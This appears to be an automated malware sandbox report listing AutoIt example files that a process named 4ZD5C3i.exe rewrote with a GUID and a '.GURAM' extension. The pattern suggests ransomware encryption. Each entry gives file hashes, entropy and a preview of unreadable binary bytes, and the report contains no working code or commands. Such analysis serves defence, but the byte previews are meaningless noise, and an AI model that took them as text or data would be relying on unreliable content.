                                                                                                                                                                                                                                                Preview:...4S?k...7P#.j..YE..."X.3.a...q.....uUhU.9.m/n<.....i/6.Bh..+O)D.s..W^...&.%..@.......J...9&<.....3..l.... .HK.T..<v<.DdQ.b.]Y.u.O.c...m.#.w...........1%.y.Hp.CMo........=..q...`,,PC;....!...)...M0.....gc.aP$_V`.].<.7N.93..ji..|.@..6sg].e...$..F..b<~.\.'..U..l.s.....E.... p....4....Q5.p.hWP.G...H...<......i_.P.9......$.X=$.p..h_.xS.2C...#...PQ.....d.K3..N.~.T....z%~..Fz...=nN..|.q.d...q.C..a...V...7N?.-......A.j#@.K.#....y6F..-M_.'..E.Bz@.T...N.h.O.D..z..<...].`./.d.$.(7..d6....S...D..9.1..hr.TjV.z..........n....R6.F%.....N._....r.3.. 73...l#.X.?"...'.K.!.1..L)n.8Q...Z}...\..#.....aq.:#...Je.....?.0.a'CJ..9....+...T.Q....o"...pF.7.d...e.S..1..1.^.a....:0...S...i., .........}%...<|?.>..RL...... $"R...X6.c.~.x....enM-3.....D.?.;.{..Pf..8%..u?.."./....f......w..2...W..@UFf.g.i.g......(...O........36'..w..{C....Z.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\ObjName[2].au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2410
                                                                                                                                                                                                                                                Entropy (8bit):7.923176099769602
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:wYHqQt83SnFJ56fDU8ZbYfyUd6uykON0BcHxBzbi4o0jZtwdc:wYHmCFb6LnZFUd3RON0q/rleC
                                                                                                                                                                                                                                                MD5:98A492337D29983F26C2DD894FCFD022
                                                                                                                                                                                                                                                SHA1:D2E6797543B6AACD73C71D820ED4D593553F9A66
                                                                                                                                                                                                                                                SHA-256:0207773BCAA822BFC66AE79446364069308EA2A91AD619C610B47B2C89690EE1
                                                                                                                                                                                                                                                SHA-512:51C3B8316B58F6746ADCE268C9750FD63C461493D101630BB607443D38EC1057D448AA0244C62E2B6DED3F2262D916238E69403705C5E3677C519EADCCB996AA
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:....^.$C.....4.M5.e.p..F..c.......Vv.....;..L.B.i...*gqZ..a.V.|......'.(....T -e.6J.`..`u..&3\.._......~.O...x.>......cb..U....V..0n......LOnj.....-....$.Q.M...=.E....G._..@~b..".\N....P.n=...K.l.S.n?..'WaI.]..........'+...-....^Q.@[_...A......1(.2......Ht.X..R.*.s.l.<b........8.5.@.R........u:...H..".m...NY...mvI*..zt".Ct.[* .hLB_.m.G..O.8.B.3ko.B.3Q.j...m.|.........k.....\.-|Ine..Y.m.....g.`L.2.TU^}.p...GW.4..(.p.s;...u.aGi.z..*..Gz.08.....qOdo....w.m.E^\"..[.*....C....oF-_$...i...:.D..4....>.@>`......i.'g..x.<.!...Q...t7YT...`Pj.L.%}`E..:.{EK.K2...QW..Nu/...6..bj_.....p.x..h..;..bg....v...b3}._..v5@.a2...D.g...x>0r..../.O......6&p..J.u......v...=.+./.M]"...Y..pl..<...THT=..?.W.viR...>JXY..+........TC..{.(...O..|..~ .9..k.....z.....L\.S..PJ....I;.nG Ty[...!....V...l...c...d;b...bb...F.~.x&....d. ......0EY.....o0....Q.N....G.. .CK..8. e....%..,...d...tY...n..4.{..........X...6.g.R.8tv......1Ol.E..R..5`..Y.)i...<...N8.K.q}..

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\OnAutoItExitRegister.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):982
                                                                                                                                                                                                                                                Entropy (8bit):7.78394135000416
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:mznVK1e8pvm/Joqq8e8qOa26gEzr6kwKjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJf:AVeNvmhoqTYOQQhKjmJrc0YXUZtwsTd
                                                                                                                                                                                                                                                MD5:B978929E6D763B2E23C92AC4BF47ADBA
                                                                                                                                                                                                                                                SHA1:004DA55B2B86B9E088DE194E910D1E0D62EA42C0
                                                                                                                                                                                                                                                SHA-256:BFBF548F673415EDED2DF54AB6EB7143A3A309CBC7B9D412C00687D7B3D91B43
                                                                                                                                                                                                                                                SHA-512:36165A79414DF7D6A9E15D6C1BA472F56B426FB0B3B03F4343284C12F3A2B129C5E9E4B87A5C5066CE04AB67D907D741C54205B0555AAC5ECFBABB43FA0358DC
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.@$.._\<s.B.P...y...........d.c...$J..8...q...j.[o..$.9'.uB.lL.u....(....../....C.#.:.)Ke...O.).....z......h[.n8{[..A..p~.X...#~>.......]1B.....q.O...8[....0.Y..5.2=/..M....Wb;._.^B.n.N....,...$..D.2..M.O..Mu...?E.?r.0...9......x..l..c@_Kf!..P..!2(.v....1....I....C.LS..sx.])%..B....[..R.....9......$......C.MF0EN,.....T.......c)..E.cn.-r.;...!.@'V.9..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$. ......"H.. A....~....p||..1..f8v...................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\OnAutoItExitUnRegister.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1022
                                                                                                                                                                                                                                                Entropy (8bit):7.809240796449972
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:5Erm3KGoiJUXkMcZYBi9jmJrc0YXUZtwsTAPMy:5E9ilGiF4o0jZtwqy
                                                                                                                                                                                                                                                MD5:42DEF7E14C12A414632105918F59DC36
                                                                                                                                                                                                                                                SHA1:B1A2D7D9A09685ACAFF9EE7AF39D27BF33E5C605
                                                                                                                                                                                                                                                SHA-256:86EAC6707FC24AE71177F51189E54F0A293A7713A12DE287A41C316F5E2AD677
                                                                                                                                                                                                                                                SHA-512:9CD5F5505957711425033AD2452782F9CDFFC203E4A410438347EC8532BCC36C9E50394A284BD18DB3C4F9C51EF0114DF7779B00716C4ADA382F7A74588ADA06
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:b....l?q...%_.P.8mbByx1..c.d*}...*.(....`Y..r.......O....CF.t'...h...g.(2....}.9t..S#/.3......[...;]x.7a.. ....\...RF.A..f....a..f.d..7.g........%Q..,O...<.QX7.....=..!>...F./.~..cz..J....9...*E.(....bd....o..9..A..x.._..g.zlG.X%..<<..2hP....]..Eo2.4iE.r...;..si...|*+.~Ew.]+..1.....-.}%.Rj...O..).V'.}k...{..8.>..r.+...?.E..7/......Q...P...P..,...M.-.{...1........B...........%;....V.e.~:,@...._........\.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$....B. ..'.|0.#/.f.?'.8Y,0.....e.J..k......

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\OnAutoItStartRegister.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1022
                                                                                                                                                                                                                                                Entropy (8bit):7.779441638516579
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:vLLr1vAKXwH/Jv8DiFCwrDjmJrc0YXUZtwsT5uy:3r15wBNH4o0jZtwxy
                                                                                                                                                                                                                                                MD5:6B67923DA01F29027A2585E5BECA9224
                                                                                                                                                                                                                                                SHA1:93440BD353CDDE8A5C2EEC0CB038A9766B126F68
                                                                                                                                                                                                                                                SHA-256:E29D6D6C9CA291D58E865C2197C76CD8011C4C5A62C5BC07BC4B733E63B35EF9
                                                                                                                                                                                                                                                SHA-512:25BE57D44028A4AA6E764F81B6641E616414D66E793F0E1A854B9B5DA26DFBB6A8E8E53708357EA3D9C701A72215235B7C82B89E9558545228849AC9AB15BA00
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.....i.i.7Q.{.S.f.......k..Z..f..Q..J..C...Lf.o...L.c$.cC.. <G..I"R.R.w...%:e...Ul.3w!...b.!....y.E.q.c...:d.U..".+....._Pm.e....Z....j..|...B.?..*v......8..X6..o....O..P:M..B.?.q<.f.....t...I......O..[...._.Z...d.jC...k]!.......?....N......vG"q..z.L..."^.5,.....KQ:S...&...o..p....F.cO...8UR.j...-f..}.:>.....so.#..r....W..Y..n..$7......{>...F.._.B.....D...^.f~.{..U....41.CQ..1....#..9o.!Y...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$..M...<..;<.!..9....S(...-".Y...........

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\Ping.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1066
                                                                                                                                                                                                                                                Entropy (8bit):7.792308677707224
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:YqCcESPX18lah0A4N02ahDHR1j2jmJrc0YXUZtwsT+e:YqCcnf18Yh0A4QDH3jI4o0jZtwi
                                                                                                                                                                                                                                                MD5:FD989B5EAAEC1BA5EB65D9B98403A870
                                                                                                                                                                                                                                                SHA1:F141485010DC4DF24EE4C37F988BDD43330BC88E
                                                                                                                                                                                                                                                SHA-256:0A869C1E751F805BBDB4D8A786ABF5814C1A3B9E6B0038FD22C1C1A94A14C40C
                                                                                                                                                                                                                                                SHA-512:1270C20CE026A530DD8113A159186B6197D3558D7987623325562A2FE8A6F41E83A8DE6798A89C7936BA760304EF8FAF9B514DF88B24311CCDABC51350A5429A
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..7.w.#....j.....e&..l.XFx.0.....E).E....L&...^.y..M,.+?.....>.........;S.v...P.7.A.......h...S[.]oY\0..r.!. ....Q....z.T~Y$...b/:.-z.`$o.:..LObR..S.!.S..Q.@N.wk..wW.F-q.)......A....[$ .B.T[S..I.+S.....H..JX..w....^.......nf.a...n..X..me.G.@.J...s.......h~Bk...oA+...9z.S._.h.H..nC.....q...8.Q.........S..T.-6-.W...x..,....}...D....x.{......MD.Y.M......^'.F..k....=.+Q."wNA.W.......uM.]..6.l.R[1.c....1...Z.VG.W.S.....yQC]*.)..[..{..>.|.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\PixelChecksum.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:DOS executable (COM, 0x8C-variant)
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1002
                                                                                                                                                                                                                                                Entropy (8bit):7.780561919421121
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:CFCpriP6x4kXn3AM2jmJrc0YXUZtwsTYf:CQpriP69QMI4o0jZtwJf
                                                                                                                                                                                                                                                MD5:A19B3919D1DC434561234F41DE22926D
                                                                                                                                                                                                                                                SHA1:A0BFAA74B701BFBC643D0DC823563822087C9E66
                                                                                                                                                                                                                                                SHA-256:853B864F5E3E4D9DBC8D4429DB45BF8DC2FCFCB1359630DFA8EB762E7E150754
                                                                                                                                                                                                                                                SHA-512:CF5A8778542A81243E65E875F787FBD21F8044F556008F447C8EB94AE950E50492976C1FD6FF22D2A564DC51FE2CF5C6193F451DA4492B367C0125A56B80F3DF
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.P{.....(......D/.....0............|.[...<..@..%y...4{.;UFcG<...Q. .....X[..<$...?..I%.Cy.p...<.S.A...i.!.....S ..*.....x..<...}sp\X..J:..Us.......D._.P..9.."9.*....%.!...U..3w...K.u.7.*........a7.e....%.}S#]o...j..e.e ..b......,=.A.@-H.v.A.C....fIZ....czy..\.w...rJ.p....D.......{.!^.r..D<.].Y.I3#.......^....}.......E......l.p.K@...8..4&V..'..n...zD.{...l>..>.......^..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$..xx..fN...(..\.....~.E..oC..j`-.h?z....................fk.W..

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\PixelGetColor.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):818
                                                                                                                                                                                                                                                Entropy (8bit):7.687729853276957
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:+cTSJzwyz2Fi1rPwYZXbDjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1i:+cTSSyz8czZfjmJrc0YXUZtwsT6iUv
                                                                                                                                                                                                                                                MD5:3F397AD6CC2A8A901889175051B17AAC
                                                                                                                                                                                                                                                SHA1:8131B20C92B5346A321114E7BBFA423A023519E7
                                                                                                                                                                                                                                                SHA-256:0E78CEAC3F6C83D3F8A71AF3B2710DC1F516C58A531DE80E9C31851BCD3BC75A
                                                                                                                                                                                                                                                SHA-512:52272558D7827D470BE2E1D6DFDFEC850C303CE58FA1EC457D916C7305925DC841A4854A2C5A3369A06DBA84986A900E3A58EAB28DCD422AFD55BA1249168A58
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:z5.H..5...N.E...~I.Y..G....Ty..+.aw..t..d........v.6.}W3...#..?Y.Nl.....j..3.z$.`..W..=##II.:^]....Z^%...}........q.}#XdH..Z`..s.@\7.....k...B2.....[..s.*..*..i...>..5takr..XWq....=..w.8..........U'. .g.Ozf.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.*.1$.FQ.[`0*..XB.)d....Az.._..T;......................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\PixelSearch.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1091
                                                                                                                                                                                                                                                Entropy (8bit):7.806975527100554
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:xDZfsLpmzPVr3tmfuk/s50ujmJrc0YXUZtwsTCF:bsaPnmf7yX4o0jZtwRF
                                                                                                                                                                                                                                                MD5:A320C4AE295260E53C51FB4953A85841
                                                                                                                                                                                                                                                SHA1:D7781F0F074AED80292F5F2CDBAA80C0F4262CF2
                                                                                                                                                                                                                                                SHA-256:B2A60888F953B1E9ABE3F205435E82D0BC244CD9637F1D025914DD6D2DE00AE4
                                                                                                                                                                                                                                                SHA-512:5A133AAB85963126117870C16279D66777EFC752B3DA0401E1C93E04215FD05193A52AEDBB39896C7E6909F43357BE1E33B28A0216B4ECDE9853E8D7D0D31D19
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:O.t.tq.?..J......#....A..e.j.3..=Z,57.Y.%.......^<@y.*.X..J...v[...qV.WK3m.[.5....i.T'Y'.."Y@.+.....ZFL~.....s....2i9.....>_I.Y3..;..$...N....l....c?8<..cUox.......h|...9h..../B6...if..*.hq....~R.B.4......s-".4Wl5.....Rf....W.=..2.M.V..@.r.......F...Y....t....F..@)".(..f..e.3,[.=.........<ovZB.\.eL.....gg})=J.-..RGr8...0....Ps..i......S(n.._#5.I.....@d..XI.%...>7...ky.X.3.-P...C.y..g.U..'J.(\&..).s...Y.D.7?...&.$.v@A&..v..(..@I!.)....k..m...r.t.3.B..Y ..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&..........

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\ProcessClose.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):929
                                                                                                                                                                                                                                                Entropy (8bit):7.776467043875684
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:dbIP9w87LCSGOzLK9yGhYKjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsOP:tIPTUS2y1KjmJrc0YXUZtwsTma
                                                                                                                                                                                                                                                MD5:C35C681A15690265586D7D371B8DE80A
                                                                                                                                                                                                                                                SHA1:37410B5292E72813565A8E6F4331FBB7DEA79197
                                                                                                                                                                                                                                                SHA-256:518DCE3B406EF46C834BEFAC2F60019AA102031DFC7532F98126BDB16A707FF7
                                                                                                                                                                                                                                                SHA-512:1DDC46DFCA76534F3E0D3A2FFD3F5FB911008FAEBE2DF31E88BD8549ECAD2D56F2B87648A9078BFAFAE1CD940087FB0B02476778BBD104FD5AA372D01F593D16
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..R......S..H.[....h[......v.....Ea.0e.. ..7...../........n.....Q1..A...T'B......3.-.h.8..S..x.W.....uB...]...5..X0..L..E......_....pNq...*.M\....)06(.......//H.NU.!.p.5r..R...p.y...2.c|.|$.~...U..K..t..........o#...4..={Vv.k.>.^..1}.M...^q.....s!.!6).&7m.._$...8.y'..Y.K...T.....O....xQ~...6=BZS.S.6...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.......ByW.;+...I.3...T&....\^...:C.DA...................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\ProcessExists.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):844
                                                                                                                                                                                                                                                Entropy (8bit):7.7225624616227195
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:+m2qcDdGL4DjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZj5Tkku:8DQ4DjmJrc0YXUZtwsTP5Tc
                                                                                                                                                                                                                                                MD5:6379EF858341E4BA37A749D25A9AE9EB
                                                                                                                                                                                                                                                SHA1:0731FBFA6FA73A4D618D2604EBB9CCC52CE99D57
                                                                                                                                                                                                                                                SHA-256:5672FF34BB72ED9AC0C7244E48B84C1F6D368550243967860F5DA1B70BD9ACF8
                                                                                                                                                                                                                                                SHA-512:2E01DA7000F1AAD7B863FF89DD083FF6FEA259E97D600F2514950986A27C5D19F0D12C41D7EE74E85F8749DFE5BD7D25633464D01A33D82863982FB735884CA3
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:........vX...'.....K......"m..8..S.cd...l]&.`..U..=X..=.]....9XI...l..]........f..L.....K.s...r...[.....'yi.>"pi..O.j-......P.W.[}R.zO.....Z.[w.......A.PJNA.?)xd....p....../.BH..@...H..[.#\.$F]u..+j...|.@...d......!....i.R+i..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$..J..+..........W..pNA..G...1..u.....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\ProcessGetStats.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1085
                                                                                                                                                                                                                                                Entropy (8bit):7.79515438441297
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:kM51DQoya8Aa8t40HxQhST2jmJrc0YXUZtwsTFuqWer:kM5mJ240HShS84o0jZtwFer
                                                                                                                                                                                                                                                MD5:D4E52C4BD92721DEA396B9083C2DC259
                                                                                                                                                                                                                                                SHA1:9FE4E50CEA89275B672D37CEBCF1DA4EA1E39804
                                                                                                                                                                                                                                                SHA-256:478B449DBC7A99766256FC8D3F72B324410C24194CF4057E4B0DDBB2F218C443
                                                                                                                                                                                                                                                SHA-512:F4A41B1BFF59D41B3166ECA9EA9E645A646BF079203D09A7F33FCCCD4F45783DB36926689BEA660F00CEAC0F0E7F1E3635DB075EC319424D867F72D8592E3AA3
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
